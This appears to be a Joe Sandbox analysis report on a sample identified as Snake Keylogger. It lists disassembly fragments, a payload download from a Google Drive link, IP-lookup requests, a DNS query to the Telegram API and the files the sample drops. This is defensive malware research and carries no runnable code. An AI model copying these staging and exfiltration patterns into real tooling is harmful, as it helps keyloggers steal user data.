Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C07C90h	4_2_37C07998
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C01E47h	4_2_37C01BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0A798h	4_2_37C0A4A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C03076h	4_2_37C02DA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0D2A0h	4_2_37C0CFA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0FDA8h	4_2_37C0FAB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C05986h	4_2_37C056B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C08FB0h	4_2_37C08CB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0030Eh	4_2_37C00040
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C06E38h	4_2_37C06B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C05E16h	4_2_37C05B48
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C09940h	4_2_37C09648
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0C448h	4_2_37C0C150
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0EF50h	4_2_37C0EC58
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C00C2Eh	4_2_37C00960
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C08158h	4_2_37C07E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0AC60h	4_2_37C0A968
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0D768h	4_2_37C0D470
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C04746h	4_2_37C04478
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0E0F8h	4_2_37C0DE00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C04BD7h	4_2_37C04908
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C07300h	4_2_37C07008
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C019DEh	4_2_37C01710
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C09E08h	4_2_37C09B10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C02BE6h	4_2_37C02918
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0C910h	4_2_37C0C618
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0F418h	4_2_37C0F120
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C054F6h	4_2_37C05228
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C08620h	4_2_37C08328
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0B128h	4_2_37C0AE30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C03506h	4_2_37C03238
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C0DC30h	4_2_37C0D938
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C41FE8h	4_2_37C41CF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C40CC8h	4_2_37C409D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C41658h	4_2_37C41360
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C40801h	4_2_37C40508
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C41190h	4_2_37C40E98
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C40338h	4_2_37C40040
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then jmp 37C41B20h	4_2_37C41828
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_37C64118
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_37C64108
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_37C60C77
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_37C60C78

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1nNVv0XzkB9FbgSCpCy-US3yz8JWGjhqn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1nNVv0XzkB9FbgSCpCy-US3yz8JWGjhqn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.FileRepMalware.23885.29286.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Desktop\Varda.ini

C:\Users\user\AppData\Local\Temp\Alpha.ini

C:\Users\user\AppData\Local\Temp\nsa3830.tmp

C:\Users\user\AppData\Local\Temp\nsf362B.tmp

C:\Users\user\AppData\Local\Temp\nsg3A73.tmp

C:\Users\user\AppData\Local\Temp\nsj34C1.tmp

C:\Users\user\AppData\Local\Temp\nsp361A.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsv1E0C.tmp

C:\Users\user\AppData\Local\Temp\nsv3726.tmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Farveriets.Ste

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Litiscontest.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\Solide251\semiquadrangle.ini

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.23885.29286.exe